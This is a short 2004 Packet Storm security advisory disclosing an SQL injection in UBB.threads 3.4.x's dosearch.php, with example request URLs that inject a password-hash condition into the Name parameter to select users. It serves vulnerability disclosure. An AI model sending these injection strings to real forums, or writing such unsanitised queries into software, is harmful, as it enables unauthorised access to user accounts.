ubbthreads.txt

2004-10-27T00:00:00
ID PACKETSTORM:34809
Type packetstorm
Reporter Florian Rock
Modified 2004-10-27T00:00:00

Description

                                        
                                            `Product:  
========  
UBB.threads  
  
Vendor:  
=======  
UBBCentral (http://www.ubbcentral.com/)  
  
Versions:  
=========  
I tested it successfull on 3.4.x  
At Version 3.5 you need to be logged in to perform a search. I didnt tested   
this version.  
  
Problem:  
========  
Sql-Injection in dosearch.php  
dosearch.php?Name=' OR U_Password='PWINMD5  
  
Impact:  
=======  
A remote user can inject SQL commands  
  
Example:  
========  
db5c82346d770f48bdd8929094c0c695 (ubbpass)  
  
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695  
OR  
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*  
-> selects a user who got "ubbpass" as password.  
  
Greets fly out to:  
==================  
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,  
peti, danjo, milch_trinker, hecky, and all i forgot  
  
Greets  
Florian Rock aka Remoter   
  
`